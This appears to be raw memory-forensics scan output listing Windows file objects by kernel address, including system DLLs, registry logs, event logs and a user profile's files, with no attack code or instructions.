+0x918b74393250 \$Directory 216 +0x918b743933c0 \Windows\System32\LogFiles\WMI\RtBackup\EtwRTEventLog-System.etl 216 +0x918b74393530 \Device\HarddiskVolume1\$Extend\$RmMetadata\$TxfLog\$TxfLog 216 +0x918b743936a0 KtmLog 216 +0x918b74393810 \:$I30:$INDEX_ALLOCATION 216 +0x918b74393980 \Windows\System32\LogFiles\WMI\RtBackup\EtwRTDiagLog.etl 216 +0x918b74393af0 \Windows\System32\LogFiles\WMI\RtBackup\EtwRTEventLog-Application.etl 216 +0x918b74393c60 \Windows\System32\LogFiles\WMI\Microsoft-Windows-Rdp-Graphics-RdpIdd-Trace.etl 216 +0x918b74393dd0 \Windows\System32\LogFiles\WMI\NtfsLog.etl 216 +0x918b743970c0 \Windows\SysWOW64\psapi.dll 216 +0x918b74397250 \Windows\SysWOW64\comctl32.dll 216 +0x918b743973e0 \Windows\SysWOW64\ws2_32.dll 216 +0x918b74397570 \Windows\SysWOW64\advapi32.dll 216 +0x918b74397700 \Windows\SysWOW64\shell32.dll 216 +0x918b74397890 \Windows\SysWOW64\clbcatq.dll 216 +0x918b74397a20 \Windows\SysWOW64\gdi32.dll 216 +0x918b74397bb0 \Windows\SysWOW64\nsi.dll 216 +0x918b74397d40 \Windows\SysWOW64\bcrypt.dll 216 +0x918b74397ed0 \Windows\SysWOW64\ole32.dll 216 +0x918b743981f0 \Windows\SysWOW64\Wldap32.dll 216 +0x918b74398380 \Windows\SysWOW64\profapi.dll 216 +0x918b74398510 \Windows\SysWOW64\sechost.dll 216 +0x918b743986a0 \Windows\SysWOW64\combase.dll 216 +0x918b74398830 \Windows\SysWOW64\imm32.dll 216 +0x918b74398b50 \Windows\SysWOW64\crypt32.dll 216 +0x918b74398ce0 \Windows\SysWOW64\bcryptprimitives.dll 216 +0x918b74398e70 \Windows\SysWOW64\rpcrt4.dll 216 +0x918b743f80c0 \$Directory 216 +0x918b743f83a0 \Windows\System32\config\TxR\{fd9a35ab-49fe-11e9-aa2c-248a07783950}.TM.blf 216 +0x918b743f87f0 \Windows\System32\config\TxR\{fd9a35ab-49fe-11e9-aa2c-248a07783950}.TMContainer00000000000000000002.regtrans-ms 216 +0x918b743f8c40 \SystemRoot\System32\Config\TxR\{fd9a35ab-49fe-11e9-aa2c-248a07783950}.TM 216 +0x918b743f8db0 \$Directory 216 +0x918b743f9200 \SystemRoot\System32\Config\TxR\{fd9a35ab-49fe-11e9-aa2c-248a07783950}.TM 216 +0x918b743f94e0 \$Directory 216 +0x918b743f9650 \Windows\System32\config\TxR\{fd9a35ab-49fe-11e9-aa2c-248a07783950}.TMContainer00000000000000000001.regtrans-ms 216 +0x918b743fa620 \$Directory 216 +0x918b743faa70 \Windows\System32\LogFiles\WMI\Wifi.etl 216 +0x918b743fabe0 \Windows\System32\LogFiles\WMI\RtBackup\EtwRTUBPM.etl 216 +0x918b743fad50 \Windows\System32\WDI\LogFiles\WdiContextLog.etl.003 216 +0x918b743fb1a0 \Windows\System32\drivers\udfs.sys 216 +0x918b743fbbb0 \$ConvertToNonresident 216 +0x918b743fc170 \$ConvertToNonresident 216 +0x918b743fd590 \$ConvertToNonresident 216 +0x918b74b150d0 \Windows\System32\en-US\user32.dll.mui 216 +0x918b74b15260 \$Directory 216 +0x918b74b153f0 \$Directory 216 +0x918b74b15580 \Windows\System32\dab.dll 216 +0x918b74b15a30 \CMApi 216 +0x918b74b15bc0 \Windows\Prefetch\VMWARERESOLUTIONSET.EXE-F78A3A07.pf 216 +0x918b74b15d50 \Windows\System32\KBDUS.DLL 216 +0x918b74b16200 \Windows\System32\en-US\winlogon.exe.mui 216 +0x918b74b16390 \Windows\System32\en-US\user32.dll.mui 216 +0x918b74b169d0 \Windows\System32 216 +0x918b74b16b60 \$Directory 216 +0x918b74b16e80 \Windows\Fonts\constanb.ttf 216 +0x918b74b171a0 \Windows\Fonts\ebrimabd.ttf 216 +0x918b74b17330 \$Directory 216 +0x918b74b174c0 \Users\santa\AppData\Local\Microsoft\Windows\Explorer\thumbcache_16.db 216 +0x918b74b17650 \Windows\System32 216 +0x918b74b17970 \Windows\System32\winlogon.exe 216 +0x918b74b17b00 \CMApi 216 +0x918b74b17c90 \Windows\System32\cdd.dll 216 +0x918b74b18140 \Windows\servicing\CbsMsg.dll 216 +0x918b74b18460 \InitShutdown 216 +0x918b74b185f0 \Windows\System32\en-US\windows.storage.dll.mui 216 +0x918b74b18780 \InitShutdown 216 +0x918b74b18910 \InitShutdown 216 +0x918b74b18c30 \wkssvc 216 +0x918b74b18dc0 \Windows\System32\upshared.dll 216 +0x918b74b3f0d0 \ProgramData\Microsoft\Diagnosis\DownloadedSettings\telemetry.P-ARIA-4bb4d6f7cafc4e9292f972dca2dcde42-bd019ee8-e59c-4b0f-a02c-84e72157a3ef-7485.json 216 +0x918b74b3f260 \Windows\System32\ncrypt.dll 216 +0x918b74b3f3f0 \Windows\System32\joinutil.dll 216 +0x918b74b3f580 \Windows\System32\winsta.dll 216 +0x918b74b3f710 \Windows\System32\EventAggregation.dll 216 +0x918b74b3f8a0 \CMApi 216 +0x918b74b3fa30 \Windows\System32\services.exe 216 +0x918b74b3fd50 \Windows\System32 216 +0x918b74b3fee0 \Windows\System32\Windows.Storage.Compression.dll 216 +0x918b74b40200 \$Directory 216 +0x918b74b40390 \Windows\System32\sxs.dll 216 +0x918b74b40520 \Windows 216 +0x918b74b406b0 \Windows\System32\lsass.exe 216 +0x918b74b40840 \Windows\System32\samsrv.dll 216 +0x918b74b409d0 \Windows\System32\wuauclt.exe 216 +0x918b74b40a00 ੘璴醋￿੘璴醋￿ 0 +0x918b74b40b60 \Windows\System32\wldp.dll 216 +0x918b74b40cf0 \Windows\System32\en-US\lsasrv.dll.mui 216 +0x918b74b411a0 \Windows\System32\ntasn1.dll 216 +0x918b74b41330 \$Directory 216 +0x918b74b414c0 \Windows\System32\lsasrv.dll 216 +0x918b74b41650 \Windows\System32\msprivs.dll 216 +0x918b74b417e0 \Windows\System32\netprovfw.dll 216 +0x918b74b41970 \Windows\System32\en-US\wdmaud.drv.mui 216 +0x918b74b41b00 \Windows\Registration\R000000000006.clb 216 +0x918b74b41c90 \Windows\System32\negoexts.dll 216 +0x918b74b41e20 \Users\santa\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms 216 +0x918b74b42140 \Windows\System32\devobj.dll 216 +0x918b74b422d0 \Windows\Globalization\Sorting\SortDefault.nls 216 +0x918b74b42460 \Windows\System32\cryptbase.dll 216 +0x918b74b425f0 \Windows\System32\kerberos.dll 216 +0x918b74b42910 \Windows\System32\cryptdll.dll 216 +0x918b74b42aa0 \Windows\System32\FirewallAPI.dll 216 +0x918b74b42c30 \Windows\System32\KerbClientShared.dll 216 +0x918b74b42dc0 \Windows\System32\mswsock.dll 216 +0x918b74bc1270 \Windows\System32\cloudAP.dll 216 +0x918b74bc1400 \Windows\System32\IPHLPAPI.DLL 216 +0x918b74bc1720 \lsass 216 +0x918b74bc18b0 \Windows\System32\efslsaext.dll 216 +0x918b74bc1a40 \Windows\System32\dpapi.dll 216 +0x918b74bc1bd0 \lsass 216 +0x918b74bc1d60 \lsass 216 +0x918b74bc1ef0 \Windows\System32\TSpkg.dll 216 +0x918b74bc2080 \Windows\System32\schannel.dll 216 +0x918b74bc2210 \Windows\System32\dpapisrv.dll 216 +0x918b74bc23a0 \Windows\System32\sspisrv.dll 216 +0x918b74bc2530 \Windows\System32\NtlmShared.dll 216 +0x918b74bc29e0 \Windows\System32\pku2u.dll 216 +0x918b74bc2b70 \Windows\System32\MicrosoftAccountCloudAP.dll 216 +0x918b74bc2d00 \Windows\System32\netutils.dll 216 +0x918b74bc2e90 \Windows\System32\wdigest.dll 216 +0x918b74bc31b0 \Windows\System32\gmsaclient.dll 216 +0x918b74bc3340 \Windows\Fonts\segoeuisl.ttf 216 +0x918b74bc34d0 \Windows\System32\msv1_0.dll 216 +0x918b74bc3660 \Windows\System32\netlogon.dll 216 +0x918b74bc37f0 \$Directory 216 +0x918b74bc3980 \Windows\debug\PASSWD.LOG 216 +0x918b74bc3b10 \$Directory 216 +0x918b74bc3ca0 \Windows\System32\rsaenh.dll 216 +0x918b74bc3e30 \Windows\System32\C_28591.NLS 216 +0x918b74bc4150 \Windows\System32\dnsapi.dll 216 +0x918b74bc4470 \ntsvcs 216 +0x918b74bc4600 \Windows\System32\scesrv.dll 216 +0x918b74bc4790 \Windows\System32\svchost.exe 216 +0x918b74bc4ab0 \ntsvcs 216 +0x918b74bc4c40 \Windows\System32\scecli.dll 216 +0x918b74bc4dd0 \$Directory 216 +0x918b74bc50f0 \scerpc 216 +0x918b74bc5280 \Windows\System32\authz.dll 216 +0x918b74bc5410 \Windows\System32\ntmarta.dll 216 +0x918b74bc55a0 \Windows\System32\slc.dll 216 +0x918b74bc5730 \scerpc 216 +0x918b74bc58c0 \Windows\System32\umpo.dll 216 +0x918b74bc5a50 \$Directory 216 +0x918b74bc5be0 \Windows\System32\umpnpmgr.dll 216 +0x918b74bc5d70 \Windows\System32\sppc.dll 216 +0x918b74bc6090 \Windows\System32\umpoext.dll 216 +0x918b74bc6220 \Windows\System32 216 +0x918b74bc63b0 \Users\santa\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini 216 +0x918b74bc6540 \Windows\System32\kdcpw.dll 216 +0x918b74bc66d0 \Windows\System32\en-US\services.exe.mui 216 +0x918b74bc6860 \ntsvcs 216 +0x918b74bc69f0 \scerpc 216 +0x918b74bc6b80 \Program Files\WindowsApps\Microsoft.VCLibs.140.00.UWPDesktop_14.0.32530.0_x64__8wekyb3d8bbwe\msvcp140.dll 216 +0x918b74bc6d10 \Windows\System32\WUDFPlatform.dll 216 +0x918b74bc71c0 \Windows\System32\profext.dll 216 +0x918b74bc7350 \Windows\System32\tdh.dll 216 +0x918b74bc74e0 \Windows\System32\dxgi.dll 216 +0x918b74bc7670 \Windows\servicing\TrustedInstaller.exe 216 +0x918b74bc7800 \Windows\System32\fontdrvhost.exe 216 +0x918b74bc7990 \Windows\System32\mintdh.dll 216 +0x918b74bc7b20 \Sessions\1\AppContainerNamedObjects\S-1-15-2-95739096-486727260-2033287795-3853587803-1685597119-444378811-2746676523 216 +0x918b74bc8160 \Sessions\0\AppContainerNamedObjects\S-1-15-2-95739096-486727260-2033287795-3853587803-1685597119-444378811-2746676523 216 +0x918b74bc82f0 \Windows\System32\fontdrvhost.exe 216 +0x918b74bc8480 \Windows\System32 216 +0x918b74bc8610 \$Directory 216 +0x918b74bc87a0 \Windows\System32 216 +0x918b74bc8c50 \Windows\System32\fwbase.dll 216 +0x918b74bc9270 \Windows\System32 216 +0x918b74bc9400 \Windows\System32\RpcRtRemote.dll 216 +0x918b74bc9590 \Windows\System32\umpo-overrides.dll 216 +0x918b74bc9720 \Windows\ServiceProfiles\NetworkService\NTUSER.DAT{fd9a35db-49fe-11e9-aa2c-248a07783950}.TMContainer00000000000000000002.regtrans-ms 216 +0x918b74bc98b0 \$Directory 216 +0x918b74bc9a40 \CMApi 216 +0x918b74bc9bd0 \Users\santa\AppData\Local\Microsoft\Windows\Explorer\thumbcache_768.db 216 +0x918b74bc9d60 \Windows\System32\en-US\svchost.exe.mui 216 +0x918b74bc9ef0 \CMNotify 216 +0x918b74bca080 \CMNotify 216 +0x918b74bca210 \Windows\ServiceProfiles\NetworkService\NTUSER.DAT 216 +0x918b74bca530 \Windows\System32\gpapi.dll 216 +0x918b74bca850 \Device\HarddiskVolume4\Windows\ServiceProfiles\NetworkService\NTUSER.DAT{fd9a35db-49fe-11e9-aa2c-248a07783950}.TM 216 +0x918b74bca9e0 \Windows\System32\RpcEpMap.dll 216 +0x918b74bcab70 \Windows\ServiceProfiles\NetworkService\NTUSER.DAT{fd9a35db-49fe-11e9-aa2c-248a07783950}.TMContainer00000000000000000001.regtrans-ms 216 +0x918b74bcad00 \Windows\ServiceProfiles\NetworkService\NTUSER.DAT.LOG1 216 +0x918b74bcae90 \Device\HarddiskVolume4\Windows\ServiceProfiles\NetworkService\NTUSER.DAT{fd9a35db-49fe-11e9-aa2c-248a07783950}.TM 216 +0x918b74bcb1b0 \Windows\ServiceProfiles\NetworkService\NTUSER.DAT.LOG2 216 +0x918b74bcb340 \Windows\System32\hid.dll 216 +0x918b74bcb4d0 \$Directory 216 +0x918b74bcb660 \Windows\ServiceProfiles\NetworkService\NTUSER.DAT{fd9a35db-49fe-11e9-aa2c-248a07783950}.TM.blf 216 +0x918b74bcb7f0 \Windows\System32\DXCore.dll 216 +0x918b74bcb980 \Windows\System32\en-US\Windows.Graphics.dll.mui 216 +0x918b74bcbb10 \Windows\System32\SleepStudy\UserNotPresentSession.etl 216 +0x918b74bcbca0 \Windows\System32\svchost.exe 216 +0x918b74bcbe30 \Windows\Fonts\vgasys.fon 216 +0x918b74bcc150 \CMNotify 216 +0x918b74bcc2e0 \epmapper 216 +0x918b74bcc470 \Endpoint 216 +0x918b74bcc600 \Endpoint 216 +0x918b74bcc790 \Winsock2\CatalogChangeListener-260-0 216 +0x918b74bcc920 \Endpoint 216 +0x918b74bccab0 \Windows\System32\en-US\mswsock.dll.mui 216 +0x918b74bccc40 \epmapper 216 +0x918b74bccdd0 \Endpoint 216 +0x918b74bcd0f0 \Endpoint 216 +0x918b74bcd280 \Endpoint 216 +0x918b74bcd410 \Endpoint 216 +0x918b74bcd5a0 \Endpoint 216 +0x918b74bcd730 \Endpoint 216 +0x918b74bcda50 \epmapper 216 +0x918b74bcdbe0 \Endpoint 216 +0x918b74bcdd70 \Endpoint 216 +0x918b74bce090 \Endpoint 216 +0x918b74bce220 \Winsock2\CatalogChangeListener-1dc-0 216 +0x918b74bce3b0 \Winsock2\CatalogChangeListener-318-0 216 +0x918b74bce540 \Windows\System32\wshqos.dll 216 +0x918b74bce6d0 \Endpoint 216 +0x918b74bce860 \Windows\System32 216 +0x918b74bce9f0 \Windows\System32\psmsrv.dll 216 +0x918b74bceb80 \Endpoint 216 +0x918b74bced10 \Endpoint 216 +0x918b74bceea0 \Windows\System32\rpcss.dll 216 +0x918b74bcf1c0 \Endpoint 216 +0x918b74bcf350 \Endpoint 216 +0x918b74bcf4e0 \$Directory 216 +0x918b74bcf670 \ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\ActivationStore.dat 216 +0x918b74bcf800 \Windows\System32\en-US\KernelBase.dll.mui 216 +0x918b74bcf990 \$Directory 216 +0x918b74bcfb20 \$Directory 216 +0x918b74bcfcb0 \Windows\System32\en-US\windows.ui.xaml.dll.mui 216 +0x918b74bcfe40 \Windows\Globalization\ICU\zoneinfo64.res 216 +0x918b74bd0160 \Reference 216 +0x918b74bd02f0 \Windows\System32\PlayToDevice.dll 216 +0x918b74bd0480 \Windows\Fonts\seguisb.ttf 216 +0x918b74bd0610 \Windows\Fonts\trebucbd.ttf 216 +0x918b74bd07a0 \Server 216 +0x918b74bd0930 \Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 216 +0x918b74bd0960 স璽醋￿স璽醋￿ 0 +0x918b74bd0ac0 \Windows\System32\conhost.exe 216 +0x918b74bd0c50 \$Directory 216 +0x918b74bd0de0 \Connect 216 +0x918b752020e0 \LSM_API_service 216 +0x918b75202270 \Windows\System32\wer.dll 216 +0x918b75202590 \Windows\System32\dwm.exe 216 +0x918b752028b0 \CMNotify 216 +0x918b75202a40 \Windows\System32\dwmredir.dll 216 +0x918b75202bd0 \Windows\Fonts\marlett.ttf 216 +0x918b75202d60 \Windows\System32\lsm.dll 216 +0x918b75202ef0 \Windows\System32\dwminit.dll 216 +0x918b75203080 \LSM_API_service 216 +0x918b75203210 \Windows\System32\PsmServiceExtHost.dll 216 +0x918b752033a0 \Windows\System32\dwmapi.dll 216 +0x918b75203530 \Windows\System32\sysntfy.dll 216 +0x918b752036c0 \Windows\System32\UXInit.dll 216 +0x918b75203d00 \Windows\Fonts\micross.ttf 216 +0x918b75203e90 \Windows\System32\rmclient.dll 216 +0x918b752041b0 \Windows\System32\apphelp.dll 216 +0x918b75204340 \Windows\Resources\Themes\aero\aero.msstyles 216 +0x918b752044d0 \LSM_API_service 216 +0x918b752047f0 \Windows\System32 216 +0x918b75204980 \Users\santa\AppData\Local\Mozilla\Firefox\Profiles\888jya8e.default-release\startupCache\scriptCache-child-current.bin 216 +0x918b75204b10 \Windows\System32\uxtheme.dll 216 +0x918b75204ca0 \Windows\SysWOW64\npmproxy.dll 216 +0x918b75205150 \Windows\System32\bisrv.dll 216 +0x918b752052e0 \Windows\Registration\R000000000006.clb 216 +0x918b75205470 \Windows\System32\dcomp.dll 216 +0x918b75205600 \Windows\System32\d2d1.dll 216 +0x918b75205790 \Windows\System32\en-US\dwm.exe.mui 216 +0x918b75205920 \Windows\System32\dwmghost.dll 216 +0x918b75205ab0 \CMApi 216 +0x918b75205c40 \Windows\System32\twinapi.appcore.dll 216 +0x918b75205dd0 \Windows\System32\winmmbase.dll 216 +0x918b752060f0 \Windows\System32\d3d11.dll 216 +0x918b75206410 \Windows\System32\rpcss.dll 216 +0x918b75206730 \Windows\System32\D3DCompiler_47.dll 216 +0x918b752068c0 \Windows\System32\dsreg.dll 216 +0x918b75206be0 \Windows\System32\msvcp110_win.dll 216 +0x918b75206d70 \Windows\System32\ResourcePolicyClient.dll 216 +0x918b75207220 \Windows\System32\embeddedmodesvcapi.dll 216 +0x918b752073b0 \Windows\System32\d3d10warp.dll 216 +0x918b752076d0 \Windows\Registration\R000000000006.clb 216 +0x918b75207860 \Windows\System32\CoreMessaging.dll 216 +0x918b752079f0 \Windows\System32\winmm.dll 216 +0x918b75207d10 \Windows\System32\xmllite.dll 216 +0x918b75207ea0 \Windows\System32\dwmcore.dll 216 +0x918b752081c0 \Windows\System32\uDWM.dll 216 +0x918b75208350 \$Directory 216 +0x918b752084e0 \$Directory 216 +0x918b75208670 \Windows\System32\config\BBI.LOG2 216 +0x918b75208800 \Windows\System32\taskschd.dll 216 +0x918b75208990 \Windows\ServiceProfiles\LocalService\NTUSER.DAT{fd9a35db-49fe-11e9-aa2c-248a07783950}.TM.blf 216 +0x918b75208b20 \Windows\ServiceProfiles\LocalService\NTUSER.DAT{fd9a35db-49fe-11e9-aa2c-248a07783950}.TMContainer00000000000000000001.regtrans-ms 216 +0x918b75208cb0 \Windows\System32\SystemEventsBrokerServer.dll 216 +0x918b75208e40 \Windows\System32\BrokerLib.dll 216 +0x918b75209160 \Windows\ServiceProfiles\LocalService\NTUSER.DAT.LOG1 216 +0x918b752092f0 \Windows\System32\ResourcePolicyServer.dll 216 +0x918b75209480 \Windows\Fonts 216 +0x918b75209610 \Windows\System32\config\BBI 216 +0x918b752097a0 \Windows\System32\dabapi.dll 216 +0x918b75209930 \Windows\ServiceProfiles\LocalService\NTUSER.DAT.LOG2 216 +0x918b75209ac0 \Windows\System32\config\BBI.LOG1 216 +0x918b75209c50 \Windows\System32\shacct.dll 216 +0x918b75209de0 \Windows\ServiceProfiles\LocalService\NTUSER.DAT 216 +0x918b75282150 \Windows\System32\LogFiles\WMI\RtBackup\EtwRTDiagtrack-Listener.etl 216 +0x918b75282710 \Windows\System32\drivers\condrv.sys 216 +0x918b752c38f0 \$PrepareToShrinkFileSize 216 +0x918b752c5ce0 \Windows\System32\drivers\cldflt.sys 216 +0x918b752c7550 \Windows\System32\drivers\wcifs.sys 216 +0x918b752c8970 \Windows\System32\drivers\luafv.sys 216 +0x918b752c9d90 \Windows\System32\drivers\storqosflt.sys 216 +0x918b7538a0e0 \CMNotify 216 +0x918b7538a270 \CMNotify 216 +0x918b7538a400 \Windows\System32\svchost.exe 216 +0x918b7538a590 \Windows\System32\svchost.exe 216 +0x918b7538a8b0 \Windows\System32 216 +0x918b7538aa40 \Windows\System32 216 +0x918b7538ad60 \Windows\System32\en-US\svchost.exe.mui 216 +0x918b7538aef0 \Windows\System32\lmhsvc.dll 216 +0x918b7538b210 \Device\HarddiskVolume4\Windows\ServiceProfiles\LocalService\NTUSER.DAT{fd9a35db-49fe-11e9-aa2c-248a07783950}.TM 216 +0x918b7538b530 \Windows\ServiceProfiles\LocalService\NTUSER.DAT{fd9a35db-49fe-11e9-aa2c-248a07783950}.TMContainer00000000000000000002.regtrans-ms 216 +0x918b7538b6c0 \Windows\System32\nrpsrv.dll 216 +0x918b7538b850 \Windows\System32\gpsvc.dll 216 +0x918b7538b9e0 \Windows\System32 216 +0x918b7538bb70 \Windows\System32\en-US\svchost.exe.mui 216 +0x918b7538bd00 \CMNotify 216 +0x918b7538be90 \Windows\System32\nlaapi.dll 216 +0x918b7538c1b0 \$Directory 216 +0x918b7538c340 \Windows\System32\svchost.exe 216 +0x918b7538c4d0 \Windows\System32 216 +0x918b7538c660 \Windows\System32\dsrole.dll 216 +0x918b7538c7f0 \Windows\Fonts\trebucit.ttf 216 +0x918b7538cb10 \Windows\System32\en-US\svchost.exe.mui 216 +0x918b7538cca0 \Windows\System32\en-US\svchost.exe.mui 216 +0x918b7538ce30 \Device\HarddiskVolume4\Windows\ServiceProfiles\LocalService\NTUSER.DAT{fd9a35db-49fe-11e9-aa2c-248a07783950}.TM 216 +0x918b7538d150 \Windows\System32\svchost.exe 216 +0x918b7538d2e0 \CMNotify 216 +0x918b7538d470 \CMNotify 216 +0x918b7538d600 \Windows\System32\WinTypes.dll 216 +0x918b7538d790 \Windows\System32\Windows.Devices.Radios.dll 216 +0x918b7538d920 \Windows\System32\httpprxc.dll 216 +0x918b7538dab0 \CMNotify 216 +0x918b7538dc40 \CMNotify 216 +0x918b7538ddd0 \CMNotify 216 +0x918b7538e0f0 \CMNotify 216 +0x918b7538e410 \Windows\System32\avrt.dll 216 +0x918b7538e5a0 \CMNotify 216 +0x918b7538e730 \CMNotify 216 +0x918b7538e8c0 \CMNotify 216 +0x918b7538ea50 \CMNotify 216 +0x918b7538ebe0 \CMNotify 216 +0x918b7538ed70 \CMNotify 216 +0x918b7538f090 \Windows\System32\bi.dll 216 +0x918b7538f220 \Windows\System32\ncbservice.dll 216 +0x918b7538f3b0 \Windows\System32\propsys.dll 216 +0x918b7538f540 \CMNotify 216 +0x918b7538f6d0 \Endpoint 216 +0x918b7538f9f0 \Windows\System32\SystemEventsBrokerClient.dll 216 +0x918b7538fb80 \Windows\System32\ISM.dll 216 +0x918b7538fea0 \Windows\System32\ninput.dll 216 +0x918b753901c0 \Windows\System32\CoreUIComponents.dll 216 +0x918b75390350 \CMApi 216 +0x918b753904e0 \CMNotify 216 +0x918b75390670 \CMNotify 216 +0x918b75390800 \Windows\Registration\R000000000006.clb 216 +0x918b75390990 \CMNotify 216 +0x918b75390b20 \CMNotify 216 +0x918b75390cb0 \Windows\System32\BthRadioMedia.dll 216 +0x918b75390e40 \CMNotify 216 +0x918b75391160 \CMNotify 216 +0x918b753912f0 \CMNotify 216 +0x918b75391480 \CMNotify 216 +0x918b75391610 \CMNotify 216 +0x918b75391930 \Windows\Registration\R000000000006.clb 216 +0x918b75391ac0 \CMNotify 216 +0x918b75391c50 \Windows\System32\BluetoothApis.dll 216 +0x918b75391de0 \CMNotify 216 +0x918b753a60e0 \Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\State\dosvcState.dat.LOG1 216 +0x918b753a6270 \Windows\System32\netprofm.dll 216 +0x918b753a6400 \Windows\System32\wtsapi32.dll 216 +0x918b753a6590 \CMNotify 216 +0x918b753a6720 \Program Files (x86)\Mozilla Firefox 216 +0x918b753a68b0 \Windows\Registration\R000000000006.clb 216 +0x918b753a6a40 \Windows\System32\svchost.exe 216 +0x918b753a6bd0 \Windows\System32\wevtsvc.dll 216 +0x918b753a6ef0 \$Directory 216 +0x918b753a7080 \CMApi 216 +0x918b753a7210 \CMNotify 216 +0x918b753a73a0 \Windows\System32\PortableDeviceApi.dll 216 +0x918b753a76c0 \CMNotify 216 +0x918b753a7850 \Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\State\dosvcState.dat 216 +0x918b753a7b70 \CMNotify 216 +0x918b753a7d00 \Windows\System32 216 +0x918b753a7e90 \Windows\System32\SEMgrSvc.dll 216 +0x918b753a81b0 \Users\santa\AppData\Local\Comms\UnistoreDB\USS.jtx 216 +0x918b753a8660 \CMNotify 216 +0x918b753a8980 \Windows\System32\en-US\svchost.exe.mui 216 +0x918b753a8ca0 \Windows\System32\en-US\dosvc.dll.mui 216 +0x918b753a8e30 \Windows\System32\UserDataTimeUtil.dll 216 +0x918b753a9150 \Program Files (x86)\Mozilla Firefox 216 +0x918b753a92e0 \Windows\System32\AudioSrvPolicyManager.dll 216 +0x918b753a9470 \Windows\System32\en-US\svchost.exe.mui 216 +0x918b753a9600 \Windows\System32\MrmDeploy.dll 216 +0x918b753a9790 \Windows\System32\sysmain.dll 216 +0x918b753a9920 \Windows\System32\msdtcVSp1res.dll 216 +0x918b753a9ab0 \Windows\System32\cryptngc.dll 216 +0x918b753a9c40 \Windows\System32\svchost.exe 216 +0x918b753a9dd0 \Windows\System32\ubpm.dll 216 +0x918b753aa0f0 \Windows\System32 216 +0x918b753aa730 \Windows\System32\wmiclnt.dll 216 +0x918b753aa8c0 \Windows\System32\profsvc.dll 216 +0x918b753aaa50 \Windows\System32\samlib.dll 216 +0x918b753aabe0 \Windows\System32\wkscli.dll 216 +0x918b753aad70 \Windows\System32\profsvcext.dll 216 +0x918b753ab090 \Windows\System32\es.dll 216 +0x918b753ab220 \Windows\SysWOW64\wship6.dll 216 +0x918b753ab3b0 \Windows\System32\logoncli.dll 216 +0x918b753ab540 \Windows\System32\appsruprov.dll 216 +0x918b753ab9f0 \CMApi 216 +0x918b753abb80 \Windows\System32\usermgrcli.dll 216 +0x918b753abd10 \Windows\System32\schedsvc.dll 216 +0x918b753ac4e0 \Windows\System32\Windows.Gaming.Input.dll 216 +0x918b753ac670 \Windows\System32\themeservice.dll 216 +0x918b753ac800 \Windows\System32\wincorlib.dll 216 +0x918b753ac990 \Windows\System32\AudioEndpointBuilder.dll 216 +0x918b753accb0 \Windows\System32\WindowsCodecs.dll 216 +0x918b753ad160 \$Directory 216 +0x918b753ad610 \Windows\System32\FontProvider.dll 216 +0x918b753ad930 \Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\~FontCache-FontFace.dat 216 +0x918b753adac0 \Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\~FontCache-System.dat 216 +0x918b753adc50 \Windows\System32\FntCache.dll 216 +0x918b753adde0 \Windows\System32\policymanager.dll 216 +0x918b754ab100 \CMNotify 216 +0x918b754ab420 \Windows\System32\winhttp.dll 216 +0x918b754ab5b0 \Winsock2\CatalogChangeListener-3f0-0 216 +0x918b754ab740 \Windows\System32\DispBroker.Desktop.dll 216 +0x918b754ab8d0 \Endpoint 216 +0x918b754aba60 \Endpoint 216 +0x918b754abbf0 \eventlog 216 +0x918b754abd80 \Windows\Registration\R000000000006.clb 216 +0x918b754ac0a0 \Endpoint 216 +0x918b754ac230 \CMNotify 216 +0x918b754ac3c0 \Windows\System32\OneCoreUAPCommonProxyStub.dll 216 +0x918b754ac550 \Endpoint 216 +0x918b754ac6e0 \Windows\System32\coloradapterclient.dll 216 +0x918b754ac870 \eventlog 216 +0x918b754aca00 \CMNotify 216 +0x918b754acb90 \eventlog 216 +0x918b754acd20 \Windows\System32\UIAnimation.dll 216 +0x918b754ad1d0 \Windows\System32\MMDevAPI.dll 216 +0x918b754ad680 \Windows\System32\mscms.dll 216 +0x918b754ad810 \Windows\System32\wevtapi.dll 216 +0x918b754ad9a0 \CMApi 216 +0x918b754adb30 \CMApi 216 +0x918b754adcc0 \Windows\Registration\R000000000006.clb 216 +0x918b754ade50 \CMNotify 216 +0x918b754ae170 \Windows\System32\actxprxy.dll 216 +0x918b754ae490 \Windows\System32\audiosrv.dll 216 +0x918b754ae620 \Windows\System32\winnsi.dll 216 +0x918b754ae940 \Windows\System32\svchost.exe 216 +0x918b754aead0 \Windows\System32\en-US\AudioEndpointBuilder.dll.mui 216 +0x918b754aec60 \Windows\System32\netjoin.dll 216 +0x918b754af110 \Windows\System32\en-US\svchost.exe.mui 216 +0x918b754af2a0 \Windows\System32\dhcpcore.dll 216 +0x918b754af430 \Windows\System32\dhcpcsvc.dll 216 +0x918b754af5c0 \Windows\System32\nlasvc.dll 216 +0x918b754af8e0 \Windows\System32\dnsrslvr.dll 216 +0x918b754afc00 \Windows\System32\DispBroker.dll 216 +0x918b754afd90 \Windows\System32\Sens.dll 216 +0x918b754b00b0 \Windows\System32\nsisvc.dll 216 +0x918b754b0240 \CMNotify 216 +0x918b754b03d0 \Windows\System32 216 +0x918b754b0560 \Windows\System32\dhcpcsvc6.dll 216 +0x918b754b06f0 \Windows\System32\wshhyperv.dll 216 +0x918b754b0880 \Windows\System32\ncsi.dll 216 +0x918b754b0a10 \Windows\System32\ssdpapi.dll 216 +0x918b754b0ba0 \CMNotify 216 +0x918b754b0d30 \$Directory 216 +0x918b754b0ec0 \Windows\System32\dhcpcore6.dll 216 +0x918b754b11e0 \Windows\System32\winevt\Logs\System.evtx 216 +0x918b754b1370 \Windows\System32\taskcomp.dll 216 +0x918b754b1690 \Windows\System32\winevt\Logs\Security.evtx 216 +0x918b754b19b0 \Windows\System32\drivers\etc 216 +0x918b754b1b40 \Endpoint 216 +0x918b754b1cd0 \Windows\System32\winevt\Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx 216 +0x918b754b1e60 \Windows\System32\winevt\Logs\Application.evtx 216 